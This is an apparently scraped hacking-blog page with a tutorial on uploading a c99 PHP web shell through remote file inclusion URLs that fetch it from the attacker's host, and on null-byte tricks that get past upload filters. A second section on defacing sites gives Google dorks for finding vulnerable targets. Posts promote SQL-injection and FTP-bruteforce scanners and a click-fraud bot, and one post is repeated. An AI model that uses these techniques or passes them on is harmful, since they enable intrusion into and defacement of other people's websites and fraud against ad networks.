Ksecurity-team

#
The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
#

#
A remote include works like this:
#

#

A website written in PHP includes files from a local directory. It usually looks something like this in the URL: "http://test.com/index.php?file=whatever" The part after the "?file=" is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : "http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
#

#
Get it?
#
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
#

#
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.
#

#
Now, lets take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:\My Documents\shell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text for as "". So, back to the upload form we go. As we go to upload our shell "C:\My Documents\shell.php" we will add to the end of that a Null Byte along with an extension. Now it looks something like this "C:\My Documents\shell.php.jpg"
#

#
(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators" and the like)
#

#
Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
#

#
Everyone got it now?
#

#
If all things go according to plan, your shell shall be uploaded and you can now take control.

II)
---
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:

Quote:inurl:"upload.php"

Quote:inurl:"page=home.html"

Quote:inurl:"news/id="

That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows

Quote:http://site.com/page=

On that page= you can put your shell so it would look like

Quote:http://site.com/page=http://geocities.co...13/c99.txt

credits To RiTaLiN

The view increaser feature in my youtube bot doesn't work as well as it use to ever since youtube's recent updates so i tested how well it would work on link-bucks and it makes 2000+ clicks per day, think i should add a link-bucks clicker feature to my bot? is 2000+ clicks any good?

Greetings All,

After a very successfull release of Sql Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with the new release which is more handy. It has new features as well as bug fixes from the older release. Please take a look for it below:

New Features:
"Look n Feel" is more attractive now.
Rich "Context Menu" items.
"Results" contain checkboxes to enable selection.
"Selected Dork" box is editable now for user convenience.
Built-in Browser for "Injection Builder" to check the impact of injection.
"Text Bucket" available for "Injection Builder" to save extra data.
"Insert Order By" button is added to "Injection Builder".
"Internet Browser" with Snapshot and HTML DOM Tree.

Bug Fixes:
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
Progress bar for "Crawler" has been fixed. It will show correct progress now.
Error on importing file is fixed now. You can import files from other directories as well.
"Searchqu" shows invalid results. It is fixed now.

Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool

[Image: scannert.png]

Download:

Link
Please rate me for this.

p0!z0neR

I have checked in : Windows xp desktop Pc and windows 7 Ultimate Laptop and is working and also is UPDATEABLE!! ..

But please only use in Vmware because i am not 100 % if is clean ...

Thanks...

Download Info

Code:

http://www.multiupload.com/EECTPQMDUH

Darkjumper is a free tool what will try to find every website that hosts at the same server as your target. Then check for every vulnerability of each website that host at the same server.

Here are some key features of "Darkjumper":

· scan sql injection, rfi, lfi, blind sql injection
· autosql injector
· proxy support
· verbocity
· autoftp bruteforcer
· IP or Proxy checker and GeoIP

Requirements:

· Python

Screenshot: http://gunslingerc0de.files.wordpress.co...jumper.png

Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml

Greetings All,

After a very successfull release of Sql Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with the new release which is more handy. It has new features as well as bug fixes from the older release. Please take a look for it below:

New Features:
"Look n Feel" is more attractive now.
Rich "Context Menu" items.
"Results" contain checkboxes to enable selection.
"Selected Dork" box is editable now for user convenience.
Built-in Browser for "Injection Builder" to check the impact of injection.
"Text Bucket" available for "Injection Builder" to save extra data.
"Insert Order By" button is added to "Injection Builder".
"Internet Browser" with Snapshot and HTML DOM Tree.

Bug Fixes:
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
Progress bar for "Crawler" has been fixed. It will show correct progress now.
Error on importing file is fixed now. You can import files from other directories as well.
"Searchqu" shows invalid results. It is fixed now.

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Gids Keylogger

Blog Archive

About Me

Labels

Stats

Members

Join Us At Facebook